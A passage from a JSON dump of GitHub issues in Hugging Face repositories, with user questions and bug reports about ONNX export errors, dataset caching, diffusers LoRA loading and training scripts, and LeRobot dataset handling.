    "body": "### Question\n\nI tried to convert [this model](https://huggingface.co/nguyenkhoa/dinov2_Liveness_detection_v2.2.3) using the following command: \n\n`python -m scripts.convert --model_id nguyenkhoa/dinov2_Liveness_detection_v2.2.3 --quantize --task image-classification`\n\nbut got the following error:\n\n``ValueError: Trying to export a dinov2 model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type dinov2 to be supported natively in the ONNX export.``\n\nI looked a bit into the `custom_onnx_configs` flag and found [this conversion example](https://github.com/huggingface/transformers.js/issues/906#issuecomment-2315290257). My question is regarding what should I pass to `custom_onnx_configs` for the conversion to work? I could pass `gpt2` as used in the example but I'm wondering what is the correct `custom_onnx_configs` input for dinov2 models.\n\nThank you!",
    "url": "https://github.com/huggingface/transformers.js/issues/1305",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-01T19:56:28Z",
    "updated_at": "2025-05-05T22:18:48Z",
    "user": "jdp8"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7545,
    "title": "Networked Pull Through Cache",
    "body": "### Feature request\n\nIntroduce a HF_DATASET_CACHE_NETWORK_LOCATION configuration (e.g. an environment variable) together with a companion network cache service.\n\nEnable a three-tier cache lookup for datasets:\n\n1. Local on-disk cache\n2. Configurable network cache proxy\n3. Official Hugging Face Hub\n\n### Motivation\n\n- Distributed training & ephemeral jobs: In high-performance or containerized clusters, relying solely on a local disk cache either becomes a streaming bottleneck or incurs a heavy cold-start penalty as each job must re-download datasets.\n- Traffic & cost reduction: A pull-through network cache lets multiple consumers share a common cache layer, reducing duplicate downloads from the Hub and lowering egress costs.\n- Better streaming adoption: By offloading repeat dataset pulls to a locally managed cache proxy, streaming workloads can achieve higher throughput and more predictable latency.\n- Proven pattern: Similar proxy-cache solutions (e.g. Harbor\u2019s Proxy Cache for Docker images) have demonstrated reliability and performance at scale: https://goharbor.io/docs/2.1.0/administration/configure-proxy-cache/\n\n### Your contribution\n\nI\u2019m happy to draft the initial PR for adding HF_DATASET_CACHE_NETWORK_LOCATION support in datasets and sketch out a minimal cache-service prototype.\n\nI have limited bandwidth so I would be looking for collaborators if anyone else is interested. ",
    "url": "https://github.com/huggingface/datasets/issues/7545",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-04-30T15:16:33Z",
    "updated_at": "2025-04-30T15:16:33Z",
    "comments": 0,
    "user": "wrmedford"
  },
  {
    "repo": "huggingface/transformers",
    "number": 37895,
    "title": "How to backpropagate the gradients of the embeddings output by the image processor to the input image tensor?",
    "body": "### Feature request\n\nI'm using the processor of Qwen2.5-VL, and the image processor within it should be Qwen2ImageProcessor. The input image I provide is a PyTorch tensor with gradients, and the processor outputs the feature embeddings of the image. How can I ensure that the gradient flow is not interrupted during this process?\n\n### Motivation\n\nI want to backpropagate the gradients of the embeddings output by the Qwen2 image processor to the input image tensor\n\n### Your contribution\n\nI can coporate to fix this issue",
    "url": "https://github.com/huggingface/transformers/issues/37895",
    "state": "open",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-04-30T15:06:40Z",
    "updated_at": "2025-05-01T13:36:24Z",
    "user": "weiminbai"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11466,
    "title": "Finetuning of flux or scratch training",
    "body": "I am new to this field and wanted to know if Is there any code available for training the flux from scratch or even finetuning the existing model. All I see is the dreambooth or Lora finetuning.",
    "url": "https://github.com/huggingface/diffusers/issues/11466",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-30T07:45:49Z",
    "updated_at": "2025-05-30T16:32:33Z",
    "comments": 2,
    "user": "preethamp0197"
  },
  {
    "repo": "huggingface/hf-hub",
    "number": 104,
    "title": "What is this software licensed under?",
    "body": "Would this also be Apache 2 like in https://github.com/huggingface/huggingface_hub/?\nThanks!",
    "url": "https://github.com/huggingface/hf-hub/issues/104",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-29T16:27:10Z",
    "updated_at": "2025-06-16T09:09:43Z",
    "user": "nathankw"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2248,
    "title": "Export cli export RT-Detr",
    "body": "```python\nTraceback (most recent call last):\n  File \"/usr/local/bin/optimum-cli\", line 8, in \n    sys.exit(main())\n             ^^^^^^\n  File \"/usr/local/lib/python3.11/dist-packages/optimum/commands/optimum_cli.py\", line 208, in main\n    service.run()\n  File \"/usr/local/lib/python3.11/dist-packages/optimum/commands/export/onnx.py\", line 265, in run\n    main_export(\n  File \"/usr/local/lib/python3.11/dist-packages/optimum/exporters/onnx/__main__.py\", line 375, in main_export\n    onnx_export_from_model(\n  File \"/usr/local/lib/python3.11/dist-packages/optimum/exporters/onnx/convert.py\", line 1033, in onnx_export_from_model\n    raise ValueError(\nValueError: Trying to export a rt-detr model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type rt-detr to be supported natively in the ONNX export.\n```\n\nWhen I try to export my fine-tuned model with RT-DETR, it always pops up with the above error.\n\nEven with the cmd line `optimum-cli export onnx -m PekingU/rtdetr_r18vd --task object-detection test_onnx` still shows the same error. So, it should not be an issue related to finetuned model.\n\nI would like to know how to export a finetuned model. It would be helpful if anyone can give me some hint. Thanks!\n",
    "url": "https://github.com/huggingface/optimum/issues/2248",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-29T08:23:17Z",
    "updated_at": "2025-05-05T08:03:21Z",
    "comments": 1,
    "user": "TheMattBin"
  },
  {
    "repo": "huggingface/open-muse",
    "number": 144,
    "title": "how to set the minimum learning rate for cosine lr_scheduler?",
    "body": "@dataclass\nclass TrainingArguments(transformers.TrainingArguments):\n    gradient_checkpointing_kwargs={'use_reentrant':False}\n    lr_scheduler_kwargs={\n        \"eta_min\":1e-6,\n        \"num_cycles\":1,\n    }\n\nIt did not work. how to set the minimum learning rate in transformers-4.51.3?",
    "url": "https://github.com/huggingface/open-muse/issues/144",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-29T02:18:59Z",
    "updated_at": "2025-04-29T02:20:42Z",
    "user": "xubuvd"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1045,
    "title": "Inefficient Config Structure without Hydra",
    "body": "Hi, I notice that the repo used Hydra before, which can modify some config param or create new config yaml files. However, this was deprecated. I wonder how to efficiently modify a new config file for policy without writing these params in the command line each time?",
    "url": "https://github.com/huggingface/lerobot/issues/1045",
    "state": "closed",
    "labels": [
      "question",
      "configuration",
      "stale"
    ],
    "created_at": "2025-04-28T11:48:08Z",
    "updated_at": "2025-11-18T02:30:46Z",
    "user": "jiangranlv"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11432,
    "title": "`.from_pretrained` `torch_dtype=\"auto\"` argument not working a expected",
    "body": "### Describe the bug\n\nHey dear diffusers team,\n\nthanks a lot for all your hard work!\n\nI would like to make use of the `torch_dtype=\"auto\"` keyword argument when loading a model/pipeline as specified [here](https://huggingface.co/docs/diffusers/main/en/api/pipelines/overview#diffusers.DiffusionPipeline.from_pretrained.torch_dtype), but the usage does not work as expected (see example below). Can you help me out with some guidance on how to use it correctly or let me know whether there is something wrong with the handling of this argument?\n\nThank you!\n\n### Reproduction\n\n```python\nfrom diffusers import StableDiffusionPipeline\n\nmodel = StableDiffusionPipeline.from_pretrained(\"CompVis/stable-diffusion-v1-4\", torch_dtype=\"auto\")\n```\n\n### Logs\n\n```shell\nPassed `torch_dtype` torch.float32 is not a `torch.dtype`. Defaulting to `torch.float32`.\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.33.1\n- Platform: Linux-5.15.0-136-generic-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.10.17\n- PyTorch version (GPU?): 2.7.0+cu126 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.30.2\n- Transformers version: 4.51.3\n- Accelerate version: 1.6.0\n- PEFT version: 0.15.2\n- Bitsandbytes version: 0.45.5\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA H100 PCIe, 81559 MiB\n- Using GPU in script?: Yes\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11432",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-28T04:31:26Z",
    "updated_at": "2025-05-13T01:42:37Z",
    "comments": 3,
    "user": "johannaSommer"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1041,
    "title": "image transform of pi0 is inconsistent with openpi",
    "body": "Thank you for pi0 work in lerobot.However, i found that image transform was quite different from openpi.\nimage transform of lerobot pi0:\n\n![Image](https://github.com/user-attachments/assets/6ff30d08-bc84-4005-8cb9-adc917f9817e)\n\nimage transform of openpi:\n\n![Image](https://github.com/user-attachments/assets/75845f92-d54e-43ea-be08-81504b6df2ff)\n\nAre there some special considerations? By the way, resize_with_pad is also different.",
    "url": "https://github.com/huggingface/lerobot/issues/1041",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-04-28T03:08:10Z",
    "updated_at": "2025-11-20T02:30:12Z",
    "user": "wushandinghua"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11423,
    "title": "Lora Hotswap no clear documentation",
    "body": "Hello everyone.\n\nHere is the scenario I have.\n\nI have say 10 LoRAs that I would like to load and use depending on the request. \n\nOption one:\nusing `load_lora_weights` - reads from the disk and moves to device: expensive operation\n\nOption two:\nload all loras and weights of non-used LoRAS with `set_adapters` method to 0.0. Not practical since the forward pass becomes expensive. Since all LoRAS are still loaded.\n\nOption three:\nFind an elegant way of loading LoRAs to CPU and then moving them to GPU as needed. While I was trying to do that, I saw the new parameter of hotswapping in hte load_lora_weights method. And this is what is described in the documentation:\n\n\nhotswap \u2014 (bool, optional) Defaults to False. Whether to substitute an existing (LoRA) adapter with the newly loaded adapter in-place. This means that, instead of loading an additional adapter, this will take the existing adapter weights and replace them with the weights of the new adapter. This can be faster and more memory efficient. However, the main advantage of hotswapping is that when the model is compiled with torch.compile, loading the new adapter does not require recompilation of the model. When using hotswapping, the passed adapter_name should be the name of an already loaded adapter. **If the new adapter and the old adapter have different ranks and/or LoRA alphas (i.e. scaling), you need to call an additional method before loading the adapter**\n\n\ncould someone help me out here and name the mysterious function to be called?\n\nand optionally would be great if someone could help me with my scenario.\n",
    "url": "https://github.com/huggingface/diffusers/issues/11423",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-04-26T13:44:08Z",
    "updated_at": "2025-05-26T15:03:03Z",
    "comments": 2,
    "user": "vahe-toffee"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11419,
    "title": "How to know that \"Textual inversion\" file I have loaded and not turn it on?",
    "body": "Reviewing the documentation I understand the load of IT with: \n\n# Add Embeddings\nPipeline.load_textual_inversion(\"Sd-Concepts-Library/Cat-Toy\"), \n\n# Remave All Token Embeddings\nPipeline.unload_textual_inversion()\n\n# Remove Just One Token\nPipeline.unload_textual_inversion (\"\")\n\n\nBut how do you know which are charged to the pipeline?",
    "url": "https://github.com/huggingface/diffusers/issues/11419",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-04-25T17:18:07Z",
    "updated_at": "2025-05-27T18:09:45Z",
    "user": "Eduardishion"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11418,
    "title": "How to add flux1-fill-dev-fp8.safetensors",
    "body": "### Describe the bug\n\nHi!\nHow to use flux1-fill-dev-fp8.safetensors in diffusers?\n\nNow I have code:\n```\ndef init_pipeline(device: str):\n    logger.info(f\"Loading FLUX Inpaint Pipeline (Fill\u2011dev) on {device}\")\n    pipe = FluxFillPipeline.from_pretrained(\n        \"black-forest-labs/FLUX.1-Fill-dev\",\n        torch_dtype=torch.bfloat16,\n        trust_remote_code=True\n    ).to(device)\n    logger.info(\"Pipeline loaded successfully\")\n    return pipe\n```\n\nAnother try:\n```\n transformer = FluxTransformer2DModel.from_single_file(\n        \"https://huggingface.co/YarvixPA/FLUX.1-Fill-dev-gguf/blob/main/flux1-fill-dev-Q4_0.gguf\",\n        quantization_config=GGUFQuantizationConfig(compute_dtype=torch.bfloat16),\n        torch_dtype=torch.bfloat16\n    )\n\n    pipe = FluxFillPipeline.from_pretrained(\n        \"black-forest-labs/FLUX.1-Fill-dev\",\n        transformer=transformer,\n        torch_dtype=torch.bfloat16,\n        trust_remote_code=True\n    ).to(device)\n\n    pipe.enable_model_cpu_offload()\n```\n\n### Reproduction\n\nhttps://huggingface.co/boricuapab/flux1-fill-dev-fp8/blob/main/README.md\nhttps://huggingface.co/pengxian/diffusion_models/blob/main/flux1-fill-dev_fp8.safetensors\n\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nWindows 11\nPython 11\n\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11418",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-25T14:58:08Z",
    "updated_at": "2025-04-28T19:06:17Z",
    "user": "SlimRG"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2242,
    "title": "[onnx] What are the functions of the generated files by optimum-cli?",
    "body": "### System Info\n\n```shell\nI try to use **optimum-cli** to export the onnx file for llama, but i don't get a onnx file as expect, but get a lot of files, so I don't know what are they used for ?\n\n(MindSpore) [ma-user llama149]$ls onnx_model/\nconfig.json  generation_config.json  model.onnx  model.onnx_data  special_tokens_map.json  tokenizer_config.json  tokenizer.json\n\n\n> refer to https://zhuanlan.zhihu.com/p/663971402\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\n\n> (py39) [ma-user llama149]$optimum-cli export onnx --model models--daryl149--llama-2-7b-hf onnx_model --task text-generation\n\n### Expected behavior\n\nget a onnx file only, that is similar to  **torch.onnx.export**",
    "url": "https://github.com/huggingface/optimum/issues/2242",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-25T13:12:35Z",
    "updated_at": "2025-04-28T09:18:06Z",
    "comments": 1,
    "user": "vfdff"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11417,
    "title": "attributeerror: 'distributeddataparallel' object has no attribute 'dtype'. did you mean: 'type'?",
    "body": "### Describe the bug\n\nattributeerror: 'distributeddataparallel' object has no attribute 'dtype'. did you mean: 'type'?\n\n### Reproduction\n\nexport MODEL_NAME=\"black-forest-labs/FLUX.1-dev\"\nexport OUTPUT_DIR=\"trained-flux-dev-dreambooth-lora\"\n\naccelerate launch train_dreambooth_lora_flux.py \\\n  --pretrained_model_name_or_path=$MODEL_NAME  \\\n  --instance_data_dir=$INSTANCE_DIR \\\n  --output_dir=$OUTPUT_DIR \\\n  --mixed_precision=\"bf16\" \\\n  --train_text_encoder\\\n  --instance_prompt=\"a photo of sks dog\" \\\n  --resolution=512 \\\n  --train_batch_size=1 \\\n  --guidance_scale=1 \\\n  --gradient_accumulation_steps=4 \\\n  --optimizer=\"prodigy\" \\\n  --learning_rate=1. \\\n  --report_to=\"wandb\" \\\n  --lr_scheduler=\"constant\" \\\n  --lr_warmup_steps=0 \\\n  --max_train_steps=500 \\\n  --validation_prompt=\"A photo of sks dog in a bucket\" \\\n  --seed=\"0\" \\\n  --push_to_hub\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.33.0\n- Platform: Linux-5.15.0-78-generic-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.10.12\n- PyTorch version (GPU?): 2.4.0+cu121 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.30.2\n- Transformers version: 4.44.1\n- Accelerate version: 0.32.1\n- PEFT version: 0.15.2\n- Bitsandbytes version: not installed\n- Safetensors version: 0.4.2\n- xFormers version: 0.0.27.post2\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11417",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-04-25T03:30:52Z",
    "updated_at": "2025-05-25T15:02:30Z",
    "comments": 1,
    "user": "asjqmasjqm"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7536,
    "title": "[Errno 13] Permission denied: on `.incomplete` file",
    "body": "### Describe the bug\n\nWhen downloading a dataset, we frequently hit the below Permission Denied error. This looks to happen (at least) across datasets in HF, S3, and GCS.\n\nIt looks like the `temp_file` being passed [here](https://github.com/huggingface/datasets/blob/main/src/datasets/utils/file_utils.py#L412) can sometimes be created with `000` permissions leading to the permission denied error (the user running the code is still the owner of the file). Deleting that particular file and re-running the code with 0 changes will usually succeed.\n\nIs there some race condition happening with the [umask](https://github.com/huggingface/datasets/blob/main/src/datasets/utils/file_utils.py#L416), which is process global, and the [file creation](https://github.com/huggingface/datasets/blob/main/src/datasets/utils/file_utils.py#L404)?\n\n```\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \n.venv/lib/python3.12/site-packages/datasets/load.py:2084: in load_dataset\n    builder_instance.download_and_prepare(\n.venv/lib/python3.12/site-packages/datasets/builder.py:925: in download_and_prepare\n    self._download_and_prepare(\n.venv/lib/python3.12/site-packages/datasets/builder.py:1649: in _download_and_prepare\n    super()._download_and_prepare(\n.venv/lib/python3.12/site-packages/datasets/builder.py:979: in _download_and_prepare\n    split_generators = self._split_generators(dl_manager, **split_generators_kwargs)\n.venv/lib/python3.12/site-packages/datasets/packaged_modules/folder_based_builder/folder_based_builder.py:120: in _split_generators\n    downloaded_files = dl_manager.download(files)\n.venv/lib/python3.12/site-packages/datasets/download/download_manager.py:159: in download\n    downloaded_path_or_paths = map_nested(\n.venv/lib/python3.12/site-packages/datasets/utils/py_utils.py:514: in map_nested\n    _single_map_nested((function, obj, batched, batch_size, types, None, True, None))\n.venv/lib/python3.12/site-packages/datasets/utils/py_utils.py:382: in _single_map_nested\n    return [mapped_item for batch in iter_batched(data_struct, batch_size) for mapped_item in function(batch)]\n.venv/lib/python3.12/site-packages/datasets/download/download_manager.py:206: in _download_batched\n    return thread_map(\n.venv/lib/python3.12/site-packages/tqdm/contrib/concurrent.py:69: in thread_map\n    return _executor_map(ThreadPoolExecutor, fn, *iterables, **tqdm_kwargs)\n.venv/lib/python3.12/site-packages/tqdm/contrib/concurrent.py:51: in _executor_map\n    return list(tqdm_class(ex.map(fn, *iterables, chunksize=chunksize), **kwargs))\n.venv/lib/python3.12/site-packages/tqdm/std.py:1181: in __iter__\n    for obj in iterable:\n../../../_tool/Python/3.12.10/x64/lib/python3.12/concurrent/futures/_base.py:619: in result_iterator\n    yield _result_or_cancel(fs.pop())\n../../../_tool/Python/3.12.10/x64/lib/python3.12/concurrent/futures/_base.py:317: in _result_or_cancel\n    return fut.result(timeout)\n../../../_tool/Python/3.12.10/x64/lib/python3.12/concurrent/futures/_base.py:449: in result\n    return self.__get_result()\n../../../_tool/Python/3.12.10/x64/lib/python3.12/concurrent/futures/_base.py:401: in __get_result\n    raise self._exception\n../../../_tool/Python/3.12.10/x64/lib/python3.12/concurrent/futures/thread.py:59: in run\n    result = self.fn(*self.args, **self.kwargs)\n.venv/lib/python3.12/site-packages/datasets/download/download_manager.py:229: in _download_single\n    out = cached_path(url_or_filename, download_config=download_config)\n.venv/lib/python3.12/site-packages/datasets/utils/file_utils.py:206: in cached_path\n    output_path = get_from_cache(\n.venv/lib/python3.12/site-packages/datasets/utils/file_utils.py:412: in get_from_cache\n    fsspec_get(url, temp_file, storage_options=storage_options, desc=download_desc, disable_tqdm=disable_tqdm)\n.venv/lib/python3.12/site-packages/datasets/utils/file_utils.py:331: in fsspec_get\n    fs.get_file(path, temp_file.name, callback=callback)\n.venv/lib/python3.12/site-packages/fsspec/asyn.py:118: in wrapper\n    return sync(self.loop, func, *args, **kwargs)\n.venv/lib/python3.12/site-packages/fsspec/asyn.py:103: in sync\n    raise return_result\n.venv/lib/python3.12/site-packages/fsspec/asyn.py:56: in _runner\n    result[0] = await coro\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \n\nself = \nrpath = '//img_1.jpg'\nlpath = '/home/runner/_work/_temp/hf_cache/downloads/6c97983efa4e24e534557724655df8247a0bd04326cdfc4a95b638c11e78222d.incomplete'\ncallback = \nversion_id = None, kwargs = {}\n_open_file = ._open_file at 0x7f27628d1120>\nbody = \ncontent_length = 521923, failed_reads = 0, bytes_read = 0\n\n    async def _get_file(\n        self, rpath, lpath, callback=_DEFAULT_CALLBACK, version_id=None, **kwargs\n    ):\n    ",
    "url": "https://github.com/huggingface/datasets/issues/7536",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-24T20:52:45Z",
    "updated_at": "2025-05-06T13:05:01Z",
    "comments": 4,
    "user": "ryan-clancy"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11396,
    "title": "How to convert the hidream lora trained by diffusers to a format that comfyui can load?",
    "body": "### Describe the bug\n\nThe hidream lora trained by diffusers can't load in comfyui, how could I convert it?\n\n### Reproduction\n\nNo\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nNo\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11396",
    "state": "closed",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-04-23T13:13:34Z",
    "updated_at": "2025-06-23T09:49:19Z",
    "user": "yinguoweiOvO"
  },
  {
    "repo": "huggingface/candle",
    "number": 2916,
    "title": "how to save and load the model",
    "body": "I  just use the varmap.save the varmap,but when I use the varmap.load then achieved a empty varmap. is there any way to save the trained model?",
    "url": "https://github.com/huggingface/candle/issues/2916",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-23T11:10:04Z",
    "updated_at": "2025-04-24T02:25:37Z",
    "user": "liguheng"
  },
  {
    "repo": "huggingface/tokenizers",
    "number": 1768,
    "title": "How to debug tokenizers with python?",
    "body": "Hi, I have a technical question. After installing transformers via pip, I successfully installed tokenizers==0.21.1 and transformers==4.49.0. When running the code:\n`tokenizer = AutoTokenizer.from_pretrained(\"../Qwen2\")  # (tokenizer configs in this folder)`\n`tokenizer.encode(data)`\nI want to trace the program flow to understand:\n\n- How tokenizers.encode_batch works internally\n- The implementation details of BPE (Byte Pair Encoding)\n\nHowever, I'm currently stuck because the code appears to be compiled into tokenizers.abi3.so, making the source code inaccessible. How can I debug or inspect these components?",
    "url": "https://github.com/huggingface/tokenizers/issues/1768",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-23T09:37:20Z",
    "updated_at": "2025-04-30T14:11:11Z",
    "user": "JinJieGan"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11390,
    "title": "Better image interpolation in training scripts follow up",
    "body": "With https://github.com/huggingface/diffusers/pull/11206 we did a small quality improvement for the SDXL Dreambooth LoRA script by making `LANCZOS` the default interpolation mode for the image resizing.\n\nThis issue is to ask for help from the community to bring this change to the other training scripts, specially for the popular ones.\n\nSince this is a really easy to make contribution I'll ask that we leave this issue for beginners and people that want to start learning how to contribute to open source projects.\n\nWhat I think are the most important ones:\n\n- [x]  [train_dreambooth_flux](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_flux.py)\n- [x] [train_dreambooth_lora](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora.py)\n- [x] [train_dreambooth_lora_lumina2](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_lumina2.py)\n- [x] [train_dreambooth_lora_sdxl](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sdxl.py)\n- [x] [train_controlnet_flux](https://github.com/huggingface/diffusers/blob/main/examples/controlnet/train_controlnet_flux.py)\n- [x] [train_controlnet_sdxl](https://github.com/huggingface/diffusers/blob/main/examples/controlnet/train_controlnet_sdxl.py)\n- [x] [train_text_to_image](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image.py)\n- [x] [train_text_to_image_lora](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_lora.py)\n- [x] [train_text_to_image_sdxl](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_sdxl.py)\n- [x] [train_text_to_image_lora_sdxl](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_lora_sdxl.py)\n- [x] [train_dreambooth_lora_flux_advanced](https://github.com/huggingface/diffusers/blob/main/examples/advanced_diffusion_training/train_dreambooth_lora_flux_advanced.py)\n- [x] [train_dreambooth_lora_sd15_advanced](https://github.com/huggingface/diffusers/blob/main/examples/advanced_diffusion_training/train_dreambooth_lora_sd15_advanced.py)\n- [x] [train_dreambooth_lora_sdxl_advanced](https://github.com/huggingface/diffusers/blob/main/examples/advanced_diffusion_training/train_dreambooth_lora_sdxl_advanced.py)\n\nIf you have other preference, please feel free to ask me to add it.\n\nIf you want to contribute just answer to this issue with the one you want to do and tag me in the PR. Please only take one since I want to use this issue to get people to learn the ropes on how to contribute and get started with open source.",
    "url": "https://github.com/huggingface/diffusers/issues/11390",
    "state": "closed",
    "labels": [
      "good first issue",
      "contributions-welcome"
    ],
    "created_at": "2025-04-23T00:04:10Z",
    "updated_at": "2025-05-05T16:35:18Z",
    "comments": 20,
    "user": "asomoza"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1019,
    "title": "How to resume dataset creation after interruption instead of starting from scratch?",
    "body": "Recently our dataset creation + upload got interrupted due to an error not related to LeRobot. However, I have not been able to launch the dataset creation using the information already processed. My cache folder shows the data, meta, and videos folders, and I was able to determine using the episodes.jsonl file in meta folder that there were 579 episodes processed. \n\nWhen I try to resume from 580th episode, the `LeRobotDataset.create()` command gives the error that `FileExistsError: [Errno 17] File exists:` because the cache has it. How to resume it instead of having to start from scratch again?",
    "url": "https://github.com/huggingface/lerobot/issues/1019",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-22T21:30:12Z",
    "updated_at": "2025-04-22T21:45:00Z",
    "user": "Anas-7"
  },
  {
    "repo": "huggingface/peft",
    "number": 2508,
    "title": "How to save the custom module into adapter_model.safetensrs when integrating new peft method",
    "body": "Just don't know where to save and load the module, or something can mark which module need to be saved.\n\nFor example, we want a moe of lora, where multi-lora and a router will be the trainable part and need to be saved.",
    "url": "https://github.com/huggingface/peft/issues/2508",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-22T15:46:39Z",
    "updated_at": "2025-04-30T11:01:58Z",
    "user": "AaronZLT"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1015,
    "title": "How to efficiently collect and standardize datasets from multiple Gymnasium environments?",
    "body": "Hello, I am studying how to collect datasets from various Gymnasium environments for reinforcement learning and imitation learning experiments. Currently, I can collect some data from real environments, but how to collect data from Gymnasium?",
    "url": "https://github.com/huggingface/lerobot/issues/1015",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "good first issue"
    ],
    "created_at": "2025-04-22T08:50:34Z",
    "updated_at": "2025-10-17T11:16:09Z",
    "user": "ybu-lxd"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1013,
    "title": "When creating dataset, how to save_episode with existing video?",
    "body": "For video with compatible frames, height and width that is recorded/rendered elsewhere, how can I add it to an episode directly without redundant decode-encode round-trip?",
    "url": "https://github.com/huggingface/lerobot/issues/1013",
    "state": "closed",
    "labels": [
      "enhancement",
      "dataset",
      "stale"
    ],
    "created_at": "2025-04-22T04:05:10Z",
    "updated_at": "2025-12-25T02:35:25Z",
    "user": "jjyyxx"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1012,
    "title": "why chunk_size not used in PI0?",
    "body": "https://github.com/huggingface/lerobot/blob/b43ece89340e7d250574ae7f5aaed5e8389114bd/lerobot/common/policies/pi0/modeling_pi0.py#L658\n\nIs it more meaningful and reasonable here to change `n_action_steps` to `chunk_size`, since `chunk_size` means prediction action horizon and `n_action_steps` means action steps actually applied to control the robot?",
    "url": "https://github.com/huggingface/lerobot/issues/1012",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-04-22T03:43:38Z",
    "updated_at": "2025-11-04T02:30:18Z",
    "user": "feixyz10"
  },
  {
    "repo": "huggingface/huggingface_hub",
    "number": 3020,
    "title": "How to run apps in local mode? local_files_only is failing",
